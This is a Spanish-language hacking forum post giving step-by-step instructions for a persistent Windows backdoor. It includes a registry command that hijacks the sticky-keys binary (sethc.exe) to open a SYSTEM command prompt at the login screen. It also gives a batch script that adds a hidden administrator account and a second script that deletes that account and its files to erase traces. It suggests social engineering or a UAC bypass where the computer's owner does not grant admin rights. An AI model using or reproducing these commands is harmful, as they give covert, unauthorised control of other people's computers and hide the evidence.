elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Como tener siempre acceso a un ordenador.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como tener siempre acceso a un ordenador.  (Leído 3,117 veces)
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Como tener siempre acceso a un ordenador.
« en: 3 Junio 2017, 22:35 pm »

Hola hoy he descubierto entre comillas como tener acceso a un pc sin cambiar la clave de ningún usuario.

Pasos
1. Necesitas tener privilegios de administrador durante unos segundos y poner este cosigo en una CMD ejecutada con privilegios.
Codigo:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
(Si no puedes tener permisos de administrador porque el dueño de el ordenador no lo consiente intenta ingeniería social o algún BypassUAC)
2. Crear un directorio donde sea con el nombre que quieras con dos .bats uno que es el que hay que ejecutar y el otro es para limpiar huellas.
Codigo 1
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ---------------------------------------------------
echo Creando nuevo usuario...
net user Exploit /add
echo Usuario creado
echo Dando permisos de administrador...
net localgroup administradores Exploit /add
echo El usuario ha recivido privilegios de administrador
echo Necesita reiniciar el ordenador para que haga efecto.
echo Pulse una tecla para reiniciar.
pause>null
DEL null
shutdown /r -t 00
exit
Codigo 2
@echo off
color 0a
title BaCkDoOr
echo ---------------------------------------------------
echo ===================================================
echo /\/\/\/\/\/\/\/Apollo Admin Exploit/\/\/\/\/\/\/\/\
echo ===================================================
echo ---------------------------------------------------
echo Eliminado usuario..
net user Exploit /delete
echo Usuario eliminado!
echo Eliminando archivos residuales
cd ..
cd C:/Users/
RD /S /Q Exploit
echo Pulse cualquier tecla para reiniciar.
pause>null
del null
shutdown /r -t 00
exit

Estos dos bats necesitan ser ejecutados con permisos de administrador pero eso ya lo habíamos pensado antes verdad  >:D
3. Cerraremos sesión y pulsaremos el Shift 5 veces seguidas y se nos abrirá una cmd con todos los derechos. Lo siguiente sera ir al directorio donde abreis guardado los dos bats y ejecutar el primer bat y luego se reiniciara el pc. Después del reinicio aparecerá un usuario nuevo llamado Exploit iniciaran sesión con todos los privilegios posibles.

4.Disfruten de su acceso pero no apaguen el ordenador cierren sesión y con el mismo proceso para abrir la cmd ejecuten el segundo bat que eliminara el usuario y todos los ficheros para que después del reinicio no quedara nada relacionado con el usuario previamente creado.

Ya se que esto es muy sencillo pero mas vale tenerlo por si nos cambian la contraseña o no la recordamos.

By Apollo.
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines